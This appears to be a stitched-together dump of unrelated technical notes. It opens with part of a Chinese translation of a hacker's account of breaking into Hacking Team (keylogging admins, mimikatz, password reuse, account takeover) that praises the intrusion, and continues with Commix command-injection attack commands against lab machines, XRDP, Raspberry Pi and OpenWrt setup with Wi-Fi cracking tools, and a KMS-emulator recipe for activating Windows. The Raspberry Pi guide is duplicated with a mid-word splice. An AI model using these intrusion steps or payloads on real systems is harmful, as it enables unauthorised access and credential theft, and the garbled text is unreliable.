通过监视Christian Pozzi(Hacking Team的系统管理员),我获取到访问Nagios网络监视服务器的权限,而它带给我访问到’rete sviluppo(网络发展)’区域的权限(存放RCS源码的开发网络区域)。通过一记简单的组合拳(利用PowerSploit的Get-Keystrokes 和 Get-TimedScreenshot [13]功能模块),nishang(基于powershell的渗透测试框架)的Do-Exfiltration以及GPO,我可以监视网络中任意一个员工,甚至是整个域。

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

[2] http://www.harmj0y.net/blog/tag/powerview/

[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/

[4] http://www.harmj0y.net/blog/redteaming/powerview20/

[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/

[6] http://www.slideshare.net/harmj0y/i-have-the-powerview

[7] https://adsecurity.org/?p=2535

[8] https://www.youtube.com/watch?v=rpwrKhgMd7E

[9] https://github.com/mubix/netview

[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/

[11] https://adsecurity.org/?page_id=41

[12] http://www.darkoperator.com/?tag=Active+Directory

[13] https://github.com/PowerShellMafia/PowerSploit

[14] https://github.com/samratashok/nishang

14、狩猎系统管理员

通过查阅内部IT基础设施的相关文档[1],我知道目前仍然没有权限去访问其中的重要区域’Rete Sviluppo’,这个区域是存放RCS源代码的地方,且是独立的网络。一个企业的系统管理员通常来说,都会有权限访问所有的设备、网络及系统等。我通过查询搜索Mauro Romeo 和 Christian Pozzi的计算机,查看他们是如何访问到’rete sviluppo’区域以及是否存在其他有用的系统。访问他们的计算机很容易,因为我具备域管理员权限,而他们的计算机则是Windows域中的一部分,所以我可以管理其计算机。uro Romeo的计算机上并没有一个开放的端口,所以我打开了WMI端口,以便能够执行meterpreter [3].除了通过Get-Keystrokes 和 Get-TimedScreenshot模块收集击键信息和应用,我还使用许多metasploit 的收集模块,CredMan.ps1 [4],并基于收集的结果进行检索。之后,我看到 Pozzi有一个加密卷,并等待挂载,所以我将其复制了一份下来。而这里估计会有很多人嘲笑Christian Pozzi的弱口令吧(而Christian Pozzi也算是为我们提供了很多喜剧的素材[6][7][8][9])。最后通过mimikatz 和击键记录工具得到了所有的密码。

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/

[2] http://www.hammer-software.com/wmigphowto.shtml

[3] https://www.trustedsec.com/june2015/no_psexec_needed/

[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde

[5] http://pwnwiki.io/#!presence/windows/find_files.md

[6] http://archive.is/TbaPy

[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/

[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt

[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/

15、桥梁

在Christian Pozzi的加密卷里面,是一个存放着许多密码的文本文件。其中有一个密码便是Nagios服务器的,而为了对网络进行监控,该服务器是可以访问到‘Rete Sviluppo’区域的,这样,在独立的网络之间,就架起了一座桥梁。

16、再使用及重置密码

通过读取邮件,我查看到Daniele Milan允许访问到git存储库。而我已经有了他的Windows密码,感谢mimikatz。我尝试使用这个密码登录进git服务器,登录成功!使用它进行sudo,也执行成功!对于他的gitlab服务器和twitter账户,我通过使用“忘记密码”的方式,再通过邮件重置密码。

17、结语

这就是整个过程。轻易渗透进企业,并阻止其继续破坏人权。这也是黑客的魅力和不对称性之美:只需100小时的工作,便可以摧毁一个估值数百万美元的公司数年来的工作成果。黑客攻击能赋予被压迫者去抗争,并获取胜利的能力。

Hacking Team一直以来视己为意大利的创新点。而我看Vincenzetti,包括他的公司,他在政界及警察领域的朋友,其人就属于传统的意大利法西斯主义分子。最后,我想把这本指南献给迪亚兹阿曼多学校袭击事件的受害者,以及那些鲜血洒在意大利法西斯手中的人。

[1] https://twitter.com/coracurrier/status/618104723263090688

*参考来源:pastebin,FB小编troy编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

Standard XRDP installation on Ubuntu 16.04

From:http://c-nergy.be/blog/?p=8952

Assumptions

For this post, we have make some assumptions.

  • Ubuntu 16.04 (Final Release version) is used
  • The Mate-desktop will be installed on the machine (as alternative desktop environment)
  • We will configure our system to match on localized version (i.e. we are using a Belgian french keyboard)
  • Since Ubuntu 15.04, upstart has been replaced by systemd component. The systemd component is used in our scenario
  • No additional configuration is needed to reconnect to the same session if you are using the latest version of the xrdp package found in the Ubuntu Repository

Installation Process

Step 1 – Install XRDP Package from Ubuntu Repository

A standard installation for us means that we will be using the xrdp package available within the Ubuntu repository. To install the xrdp software from Ubuntu repository, you will need to issue the following command in a terminal.

sudo apt-get install xrdp

Because of the sudo command, you will be prompted for a password. After entering your password, you will be asked to confirm your action by pressing Y (see screenshot below)

U16_Xrdp_1

Click on picture for better resolution

Step 2 – Install an alternative Desktop 

xrdp and Unity desktop (or Gnome 3) are not working well together.  If you do not install another desktop environment, when you will try to connect to your Ubuntu machine, you will see only a gray screen.  The workaround to this situation is to install an alternate desktop that can work with xrdp software solution.

Our preferred desktop alternative is Mate-Desktop.  This post will show you how to install the Mate-Desktop and have it working with the xrdp software solution.

To install the Mate-desktop, issue the following command from the Terminal Session

sudo apt-get update

sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon

Note :

Desktop interface such as xfce, LXDE,LXQT, KDE  are all potential candidates.  Check the following links for more information and installation and configuration procedures

 

Step 3 – Configuring xRDP to use your desktop environment

At this stage, we need to configure our system in order to tell xrdp that an alternate desktop needs to be used.  In our case, we have to tell xrdp that we want to use Mate-Desktop as alternate desktop. With the previous version of Ubuntu, you would need to create the ~/.xsession file.  In Ubuntu 16.04, it seems that this approach is not working anymore.  We need to configure the system differently when working with Ubuntu 16.04

Starting the alternate desktop environment

Important Note : 

In our scenario, we have installed mate-desktop, If you have installed another Desktop alternative, you will have to adapt the configuration of the startwm.sh file to reflect your settings.

If you use the  ~/.xsession file approach, you will experience the same symptoms as before i.e. grey screen. We will need to configure the system in a different way.  To have xRDP working in Ubuntu 16.04, you will need to  update the /etc/xrdp/startwm.sh file. To configure this, issue the following command in your Terminal console

sudo sed -i.bak '/fi/a #xrdp multiple users configuration \n mate-session \n' /etc/xrdp/startwm.sh

ubxprd16.04

Click on picture for better resolution

Note :

Remember that the command above is to be used when you have installed the Mate-Desktop.  If you have installed a different desktop environment, you will need to adapt the command accordingly. Please check the following links

Step 4 – Configuring xRDP Keyboard 

By default, the xRDP login screen will use an en-us keyboard layout. You remote session will also be using the en-us keyboard layout.  If you are using a different keyboard layout than the english one, you need to perform the following actions in order to update the configuration of the xrdp software.

In my case, I’m using a Belgian French keyboard, so I had to tell xrdp to use the belgian french keyboard as well.  To do that, you need to perform the following actions :

Step 1 : You go to the /etc/xrdp directory

Step 2 : you issue the command setxkbmap -layout <%your layout%> to define which keyboard map/layout to use

XRDP_15.04_5.PNG

Click on Picutre for better Resolution 

Step 3 : create a copy of the km-0409.ini file into the same directory. It seems that this is the default file used by xrdp to define the keyboard layout. You will need to use sudo in order to be able to write into the directory

Step 4 : Check that you have a backup of your file by typing the dir or ls command

Step 5 : update the file by issuing the following command sudo xrdp-genkeymap km-0409.ini

XRDP_15.04_6.PNG

Click on Picutre for better Resolution 

Step 5 – Reconnect to the Same Session

Since Ubuntu 14.10, a new xrdp package has been made available in the Ubuntu repository. This package fixes a long time issue related to the fact that users could not reconnect to the same session.  If you are using the package xrdp 0.6.1-1, you do not need to perform any customization, you will reconnect automatically to the same session.

Commix usage Examples

1. Exploiting [Damn Vulnerable Web App] (http://www.dvwa.co.uk/):

ro[email protected]:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting [php-Charts 1.0] (http://www.exploit-db.com/exploits/25496/) using injection payload suffix & prefix string:

[email protected]:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting [OWASP Mutillidae] (https://www.owasp.org/index.php/Category:OWASP_Mutillidae) using extra headers and HTTP proxy:

[email protected]:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting [Persistence] (https://www.vulnhub.com/entry/persistence-1,103/) using ICMP exfiltration technique:

[email protected]:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting [Persistence] (https://www.vulnhub.com/entry/persistence-1,103/) using an alternative (python) shell:

[email protected]:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting [Kioptrix: Level 1.1 (#2)] (http://www.kioptrix.com/dlvm/Kioptrix_Level_2.rar):

[email protected]:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting [Kioptrix: 2014 (#5)] (https://www.vulnhub.com/entry/kioptrix-2014-5,62/) using custom user-agent and specified injection technique:

[email protected]:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting [CVE-2014-6271/Shellshock] (https://pentesterlab.com/exercises/cve-2014-6271):

[email protected]:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting [commix-testbed (cookie)] (https://github.com/stasinopoulos/commix-testbed/tree/master/cookie) using cookie-based injection:

[email protected]:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting [commix-testbed (user-agent)] (https://github.com/stasinopoulos/commix-testbed/tree/master/user-agent) using ua-based injection:

[email protected]:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting [commix-testbed (referer)] (https://github.com/stasinopoulos/commix-testbed/tree/master/referer) using referer-based injection:

[email protected]:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting [Flick 2] (https://www.vulnhub.com/entry/flick-2,122/) using custom headers and base64 encoding option:

[email protected]:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting [commix-testbed (JSON-based)] (https://github.com/stasinopoulos/commix-testbed/tree/master/scenarios/regular/POST) using JSON POST data:

[email protected]:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting [SickOs 1.1] (https://www.vulnhub.com/entry/sickos-11,132/) using shellshock module and HTTP proxy:

[email protected]:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

Raspberry pi 2 build kernel

Kernel Building

There are two main methods for building the kernel. You can build locally on a Raspberry Pi which will take a long time; or you can cross-compile, which is much quicker, but requires more setup.

Local building

On a Raspberry Pi first install the latest version of Raspbian from the downloads page. Then boot your Pi, plug in Ethernet to give you access to the sources, and log in.

First get the sources, which will take some time:

$ git clone --depth=1 https://github.com/raspberrypi/linux

Add missing dependencies:

$ sudo apt-get install bc

Configure the kernel – as well as the default configuration you may wish to configure your kernel in more detail or apply patches from another source to add or remove required functionality:

Run the following commands depending on your Raspberry Pi version.

Raspberry Pi 1 (or Compute Module) Default Build Configuration

$ cd linux
$ KERNEL=kernel
$ make bcmrpi_defconfig

Raspberry Pi 2 Default Build Configuration

$ cd linux
$ KERNEL=kernel7
$ make bcm2709_defconfig

Build and install the kernel, modules and Device Tree blobs; this step takes a lot of time…

$ make zImage modules dtbs
$ sudo make modules_install
$ sudo cp arch/arm/boot/dts/*.dtb /boot/
$ sudo cp arch/arm/boot/dts/overlays/*.dtb* /boot/overlays/
$ sudo cp arch/arm/boot/dts/overlays/README /boot/overlays/
$ sudo scripts/mkknlimg arch/arm/boot/zImage /boot/$KERNEL.img

Note: On a Raspberry Pi 2, adding -j4 (make -j4 zImage modules dtbs) splits the work between all four cores, speeding up compilation significantly.

Cross-compiling

First you are going to require a suitable Linux cross-compilation host. We tend to use Ubuntu; since Raspbian is also a Debian distribution it means using similar command lines and so on.

You can either do this using VirtualBox (or VMWare) on Windows, or install it directly onto your computer. For reference you can follow instructions online at Wikihow.

Install toolchain

Use the following command:

$ git clone https://github.com/raspberrypi/tools

You can then copy the toolchain to a common location such as /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian, and add /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian/bin to your $PATH in the .bashrc in your home directory. For 64bit, use /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian-x64/bin. While this step is not strictly necessary, it does make it easier for later command lines!

Get sources

To get the sources, refer to the original GitHub repository for the various branches.

$ git clone --depth=1 https://github.com/raspberrypi/linux

Build sources

To build the sources for cross-compilation there may be extra dependencies beyond those you’ve installed by default with Ubuntu. If you find you need other things please submit a pull request to change the documentation.

Enter the following commands to build the sources and Device Tree files.

For Pi 1 or Compute Module:

$ cd linux
$ KERNEL=kernel
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- bcmrpi_defconfig

For Pi 2:

$ cd linux
$ KERNEL=kernel7
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- bcm2709_defconfig

Then for both:

$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- zImage modules dtbs

Note: To speed up compilation on multiprocessor systems, and get some improvement on single processor ones, use -j n where n is number of processors * 1.5. Alternatively, feel free to experiment and see what works!

Install directly onto the SD card

Having built the kernel you need to copy it onto your Raspberry Pi and install the modules; this is best done directly using an SD card reader.

First use lsblk before and after plugging in your SD card to identify which one it is; you should end up with something like this:

sdb
   sdb1
   sdb2

If it is a NOOBS card you should see something like this:

sdb
  sdb1
  sdb2
  sdb3
  sdb5
  sdb6

In the first case sdb1/sdb5 is the FAT partition, and sdb2/sdb6 is the ext4 filesystem image (NOOBS).

Mount these first:

mkdir mnt/fat32
mkdir mnt/ext4
sudo mount /dev/sdb1 mnt/fat32
sudo mount /dev/sdb2 mnt/ext4

Adjust the partition numbers for the NOOBS images.

Next, install the modules:

sudo make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- INSTALL_MOD_PATH=mnt/ext4 modules_install

Finally, copy the kernel and Device Tree blobs onto the SD card, making sure to back up your old kernel:

sudo cp mnt/fat32/$KERNEL.img mnt/fat32/$KERNEL-backup.img
sudo scripts/mkknlimg arch/arm/boot/zImage mnt/fat32/$KERNEL.img
sudo cp arch/arm/boot/dts/*.dtb mnt/fat32/
sudo cp arch/arm/boot/dts/overlays/*.dtb* mnt/fat32/overlays/
sudo cp arch/arm/boot/dts/overlays/README mnt/fat32/overlays/
sudo umount mnt/fat32
sudo umount m

Kernel Building

There are two main methods for building the kernel. You can build locally on a Raspberry Pi which will take a long time; or you can cross-compile, which is much quicker, but requires more setup.

Local building

On a Raspberry Pi first install the latest version of Raspbian from the downloads page. Then boot your Pi, plug in Ethernet to give you access to the sources, and log in.

First get the sources, which will take some time:

$ git clone --depth=1 https://github.com/raspberrypi/linux

Add missing dependencies:

$ sudo apt-get install bc

Configure the kernel - as well as the default configuration you may wish to configure your kernel in more detail or apply patches from another source to add or remove required functionality:

Run the following commands depending on your Raspberry Pi version.

Raspberry Pi 1 (or Compute Module) Default Build Configuration

$ cd linux
$ KERNEL=kernel
$ make bcmrpi_defconfig

Raspberry Pi 2 Default Build Configuration

$ cd linux
$ KERNEL=kernel7
$ make bcm2709_defconfig

Build and install the kernel, modules and Device Tree blobs; this step takes a lot of time...

$ make zImage modules dtbs
$ sudo make modules_install
$ sudo cp arch/arm/boot/dts/*.dtb /boot/
$ sudo cp arch/arm/boot/dts/overlays/*.dtb* /boot/overlays/
$ sudo cp arch/arm/boot/dts/overlays/README /boot/overlays/
$ sudo scripts/mkknlimg arch/arm/boot/zImage /boot/$KERNEL.img

Note: On a Raspberry Pi 2, adding -j4 (make -j4 zImage modules dtbs) splits the work between all four cores, speeding up compilation significantly.

Cross-compiling

First you are going to require a suitable Linux cross-compilation host. We tend to use Ubuntu; since Raspbian is also a Debian distribution it means using similar command lines and so on.

You can either do this using VirtualBox (or VMWare) on Windows, or install it directly onto your computer. For reference you can follow instructions online at Wikihow.

Install toolchain

Use the following command:

$ git clone https://github.com/raspberrypi/tools

You can then copy the toolchain to a common location such as /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian, and add /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian/bin to your $PATH in the .bashrc in your home directory. For 64bit, use /tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian-x64/bin. While this step is not strictly necessary, it does make it easier for later command lines!

Get sources

To get the sources, refer to the original GitHub repository for the various branches.

$ git clone --depth=1 https://github.com/raspberrypi/linux

Build sources

To build the sources for cross-compilation there may be extra dependencies beyond those you've installed by default with Ubuntu. If you find you need other things please submit a pull request to change the documentation.

Enter the following commands to build the sources and Device Tree files.

For Pi 1 or Compute Module:

$ cd linux
$ KERNEL=kernel
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- bcmrpi_defconfig

For Pi 2:

$ cd linux
$ KERNEL=kernel7
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- bcm2709_defconfig

Then for both:

$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- zImage modules dtbs

Note: To speed up compilation on multiprocessor systems, and get some improvement on single processor ones, use -j n where n is number of processors * 1.5. Alternatively, feel free to experiment and see what works!

Install directly onto the SD card

Having built the kernel you need to copy it onto your Raspberry Pi and install the modules; this is best done directly using an SD card reader.

First use lsblk before and after plugging in your SD card to identify which one it is; you should end up with something like this:

sdb
   sdb1
   sdb2

If it is a NOOBS card you should see something like this:

sdb
  sdb1
  sdb2
  sdb3
  sdb5
  sdb6

In the first case sdb1/sdb5 is the FAT partition, and sdb2/sdb6 is the ext4 filesystem image (NOOBS).

Mount these first:

mkdir mnt/fat32
mkdir mnt/ext4
sudo mount /dev/sdb1 mnt/fat32
sudo mount /dev/sdb2 mnt/ext4

Adjust the partition numbers for the NOOBS images.

Next, install the modules:

sudo make ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- INSTALL_MOD_PATH=mnt/ext4 modules_install

Finally, copy the kernel and Device Tree blobs onto the SD card, making sure to back up your old kernel:

sudo cp mnt/fat32/$KERNEL.img mnt/fat32/$KERNEL-backup.img
sudo scripts/mkknlimg arch/arm/boot/zImage mnt/fat32/$KERNEL.img
sudo cp arch/arm/boot/dts/*.dtb mnt/fat32/
sudo cp arch/arm/boot/dts/overlays/*.dtb* mnt/fat32/overlays/
sudo cp arch/arm/boot/dts/overlays/README mnt/fat32/overlays/
sudo umount mnt/fat32
sudo umount mnt/ext4

Another option is to copy the kernel into the same place, but with a different filename - for instance, kernel-myconfig.img - rather than overwriting the kernel.img file. You can then edit the config.txt file to select the kernel that the Pi will boot into:

kernel=kernel-myconfig.img

This has the advantage of keeping your kernel separate from the kernel image managed by the system and any automatic update tools, and allowing you to easily revert to a stock kernel in the event that your kernel cannot boot.

Finally, plug the card into the Pi and boot it!

Links

Building / cross-compiling on/for other operating systems

  • Pidora
  • ArchLinux
  • RaspBMC
  • OpenELEC


nt/ext4

Another option is to copy the kernel into the same place, but with a different filename – for instance, kernel-myconfig.img – rather than overwriting the kernel.img file. You can then edit the config.txt file to select the kernel that the Pi will boot into:

kernel=kernel-myconfig.img

This has the advantage of keeping your kernel separate from the kernel image managed by the system and any automatic update tools, and allowing you to easily revert to a stock kernel in the event that your kernel cannot boot.

Finally, plug the card into the Pi and boot it!

Links

Building / cross-compiling on/for other operating systems

  • Pidora
  • ArchLinux
  • RaspBMC
  • OpenELEC

KVM虚拟机iptables NAT端口映射

# iptables -A INPUT -p tcp -–dport 8000 -j ACCEPT

# iptables -t nat -A PREROUTING -d 115.183.0.1 -p tcp -m tcp –dport 8000 -j DNAT –to-destination 192.168.122.2:22

# iptables -t nat -A POSTROUTING -s 192.168.122.0/255.255.255.0 -d 192.168.122.2 -p tcp -m tcp –dport 22 -j SNAT –to-source 192.168.122.1

Easy Build Openwrt

I just got a TP-Link TL-MR3040 a few days ago, and successfully set it up as a PirateBox, which involved refreshing the firmware with OpenWrt rather than a stock image. This is actually a pretty cool little device for the $35, it’ll run Linux, and with OpenWrt, not only can it function as a router, it can act as a tiny server running off a file system attached via USB.

I’ve tried this build on multiple platforms, and documented some of that in a previous version of this posting. While I’ve successfully gotten the core of OpenWrt to build on OS X, and a number of things to build on CentOS, I’ve only gotten consistent and reliable results overall on Debian-like systems, so that’s what I’m going to be sticking to here.

In particular, I’ve had nothing but trouble trying to build an OpenWrt image for a Raspberry Pi anywhere other than on Debian or a Debian derivative. I have verified working builds for both the TL-MR3040 and the Raspberry Pi on Mint 17.

The instructions for building a firmware image on the OpenWrt wiki are a version or more out of date — they’re for building Attitude Adjustment, rather than Barrier Breaker.

The procedure for building top-of-trunk for OpenWrt developers is better documented than the Attitude Adjustment build seems to have been, but still a little bit scattered.

Additionally, the guide for setting up a build environment on OS X relies on MacPorts, and I prefer Homebrew, is similarly outdated, and there are a wrinkle or two along the way, so I figured I should document what I’ve done. I’m not recommending, at this point, that you try building this stuff directly on OS X. Use a VM running Debian or Mint instead, that’s my recommendation.

Set Up the Prerequisites

On Ubuntu 14.04 LTS “Trusty Tahr”/Debian 7.7.0/Mint 17

sudo apt-get install subversion build-essential libncurses5-dev zlib1g-dev gawk git ccache gettext libssl-dev xsltproc zip

On OS X 10.10 “Yosemite”

On OS X, we’ll want to specifically set up a case-sensitive file system to work on. We can create a .dmg file that we can use for our development with the following commands. Twenty gig is plenty of space.

hdiutil create -size 20g -fs "Case-sensitive HFS+" -volname OpenWrt OpenWrt.dmg
hdiutil attach OpenWrt.dmg

Getting the build environment set up right here is a little more ornate. If you don’t have Homebrew (and you should), you’ll need to get that installed first. You’ll also need to install Xcode and the Xcode Command Line Tools.

brew update
brew upgrade
brew install coreutils e2fsprogs ossp-uuid asciidoc binutils fastjar gtk+ gnu-getopt gnu-tar intltool openssl subversion rsync sdcc gawk wget findutils

When brew installs the gnu toolset, it doesn’t automatically link it into your path, and the build wants to use gnu-compatible tools. However, brew does create an auxiliary directory of gnu-compatible aliases at/usr/local/opt/coreutils/libexec/gnubin, and for the purposes of the build, we can set our path to preference those tools temporarily.

ln -s /usr/local/Cellar/gnu-getopt/1.1.5/bin/getopt /usr/local/opt/coreutils/libexec/gnubin/getopt
ln -s /usr/local/bin/gtar /usr/local/opt/coreutils/libexec/gnubin/tar
export PATH=/usr/local/opt/coreutils/libexec/gnubin:$PATH

Get the Sources

Get the Barrier Breaker sources from the upstream repo to build the current stable release:

git clone git://git.openwrt.org/14.07/openwrt.git

Or pull down the latest OpenWrt “Chaos Calmer” sources to build the “bleeding edge” top-of-trunk version:

git clone git://git.openwrt.org/openwrt.git

Prepare For the Build

Connect to the source directory, and update and install all the feeds. These represents the build schemes for all of the optional components that you can add to your OpenWrt system.

cd ~/openwrt
./scripts/feeds update -a
./scripts/feeds install -a

Configure the build.

make prereq

This sets up prerequisites for the build and then takes you into menuconfig, a screen-driven configuration utility based on the one used to set up builds for the Linux kernel.

For starts, you simply want to pick an appropriate “Target system” and “Target profile”. For the TP-Link TL-MR3040, the target system is “Atheros AR7xxx/9xxx”, subtarget “generic”. For a Raspberry Pi, the target system is “BRCOM947xx/953xx”, the only profile is “Raspberry Pi”.

build5

For an initial build, I’d suggest simply picking the correct target and leaving it at that. You can start adding other options once you’ve verified that you can produce a working build and have an idea how much free space you’ve got to play with on the system. You want to start out minimal, the MR3040 only has 4MB (!) of available flash memory.

When you’re done here, select “Exit”, and save your configuration file as .config when prompted to do so.

Build that sucker!

All it takes is a make at this point. I like to use make V=s because I like to watch it do its thing.

make
Results will be in the bin/ folder, in a subfolder corresponding to the architecture you’ve built for — in my case “ar71xx”.

新openwrt路由器

opkg update
opkg install cfdisk kmod-tun ip dnscrypt-proxy e2fsprogs luci kmod-ath9k-htc kmod-usb-net kmod-usb-net-ipheth kmod-usb-serial kmod-usb-serial-pl2303 kmod-usb-serial-wwan kmod-usb-storage kmod-usbmon reaver wget tar curl aircrack-ng reaver tcpdump ethtool usbutils macchanger udev block-mount kmod-ath9k-common kmod-ath9k nano
opkg update
opkg install cfdisk kmod-usb-storage e2fsprogs kmod-usbmon kmod-fs-ext4 block-mount usbutils udev vim-full kmod-usb-net kmod-usb-net-rndis mod-usb-net-cdc-ether unscript-proxy
 
 
opkg install cfdisk kmod-usb-storage e2fsprogs kmod-usbmon kmod-fs-ext4 block-mount usbutils udev vim-full
 
 
/etc/init.d/dnscrypt-proxy enable
/etc/init.d/dnscrypt-proxy start
 
vim /etc/config/dhcp
# option resolvfile ‘/tmp/resolv.conf.auto’
option noresolv ‘1’
list server ‘127.0.0.1#5353’
list server ‘/pootp.org/208.67.222.222′
list server ‘/pool.ntp.org/208.67.220.220’l.n
 
 
/etc/init.d/dnsmasq restart
mkdir -p /mnt/sda2
mount /dev/sda2 /mnt/sda2

mkdir -p /tmp/cproot
mount –bind / /tmp/cproot
tar -C /tmp/cproot -cvf – . | tar -C /mnt/sda2 -xf –

umount /tmp/cproot
umount /mnt/sda2

/etc/init.d/fstab enable
/etc/init.d/fstab start

vi /etc/config/fstab   //改变如下

config ‘mount’

option target ‘/’
option device ‘/dev/sda2’
option fstype ‘ext4’
option options ‘rw,sync’
option enabled ‘1’

       option enabled_fsck ‘0’

windows 激活

wget https://www.dwhd.org/wp-content/uploads/2015/07/vlmcsd-svn812-2015-08-30-Hotbird64.zip
unzip -q vlmcsd-svn812-2015-08-30-Hotbird64.zip -d /usr/local/
ln -sv /usr/local/vlmcsd-svn812-2015-08-30-Hotbird64/ /usr/local/KMS
echo "export PATH=/usr/local/KMS/binaries/Linux/intel/static:\$PATH" > /etc/profile.d/vlmcs.sh
source /etc/profile.d/vlmcs.sh
chmod +x /usr/local/KMS/binaries/Linux/intel/static/*
echo "vlmcsd-x64-musl-static" >> /etc/rc.local
vlmcsd-x64-musl-static
Windows PowerShell
版权所有 (C) 2015 Microsoft Corporation。保留所有权利。
PS C:\WINDOWS\system32> slmgr.vbs -upk
PS C:\WINDOWS\system32> slmgr.vbs -ipk W269N-WFGWX-YVC9B-4J6C9-T83GX
PS C:\WINDOWS\system32> slmgr.vbs -skms 192.168.1.227
PS C:\WINDOWS\system32> slmgr.vbs -ato
PS C:\WINDOWS\system32> slmgr.vbs -dlv
PS C:\WINDOWS\system32>
OPERATING SYSTEM EDITION                                KMS CLIENT SETUP KEY
#############################  Windows  10  ########################################
Windows 10 Professional                                W269N-WFGWX-YVC9B-4J6C9-T83GX
Windows 10 Professional N                            MH37W-N47XK-V7XM9-C7227-GCQG9
Windows 10 Enterprise                                NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Enterprise N                                DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Windows 10 Education                                NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Education N                                2WH4N-8QGBV-H22JP-CT43Q-MDWWJ
Windows 10 Enterprise 2015 LTSB                        WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2015 LTSB N                    2F77B-TNFGY-69QQF-B8YKP-D69TJ
#############################  Windows  8.1 2012R2  #################################
Windows 8.1 Professional                            GCRJD-8NW9H-F2CDX-CCM8D-9D6T9
Windows 8.1 Professional N                            HMCNV-VVBFX-7HMBH-CTY9B-B4FXY
Windows 8.1 Enterprise                                MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
Windows 8.1 Enterprise N                            TT4HM-HN7YT-62K67-RGRQJ-JFFXW
Windows Server 2012 R2 Server Standard                D2N9P-3P6X9-2R39C-7RTCD-MDVJX
Windows Server 2012 R2 Datacenter                    W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9
Windows Server 2012 R2 Essentials                    KNC87-3J2TX-XB4WP-VCPJV-M4FWM
#############################  Windows  8 2012  ######################################
Windows 8 Professional                                NG4HW-VH26C-733KW-K6F98-J8CK4
Windows 8 Professional N                            XCVCF-2NXM9-723PB-MHCB7-2RYQQ
Windows 8 Enterprise                                32JNW-9KQ84-P47T8-D8GGY-CWCK7
Windows 8 Enterprise N                                JMNMF-RHW7P-DMY6X-RF3DR-X2BQT
Windows Server 2012                                    BN3D2-R7TKB-3YPBD-8DRP2-27GG4
Windows Server 2012 N                                8N2M2-HWPGY-7PGT9-HGDD8-GVGGY
Windows Server 2012 Single Language                    2WN2H-YGCQR-KFX6K-CD6TF-84YXQ
Windows Server 2012 Country Specific                4K36P-JN4VD-GDC6V-KDT89-DYFKP
Windows Server 2012 Server Standard                    XC9B7-NBPP2-83J2H-RHMBY-92BT4
Windows Server 2012 MultiPoint Standard                HM7DN-YVMH3-46JC3-XYTG7-CYQJJ
Windows Server 2012 MultiPoint Premium                XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G
Windows Server 2012 Datacenter                        48HP8-DN98B-MYWDG-T2DCC-8W83P
